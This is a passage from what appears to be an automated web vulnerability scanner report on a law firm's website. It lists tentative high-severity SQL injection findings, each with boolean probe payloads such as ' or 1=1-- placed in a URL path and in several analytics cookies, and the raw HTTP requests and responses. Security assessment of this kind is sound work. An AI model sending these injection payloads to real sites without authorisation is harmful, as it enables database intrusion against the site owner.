Date: Thu, 12 May 2011 16:46:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:46:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14296614'%20or%201%3d1--%20 and 14296614'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm14296614'%20or%201%3d1--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:47:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /index.cfm14296614'%20or%201%3d2--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12857343'%20or%201%3d1--%20 and 12857343'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:45:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 11705977'%20or%201%3d1--%20 and 11705977'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:46:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 62299062%20or%201%3d1--%20 and 62299062%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d1--%20; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:46:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d2--%20; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
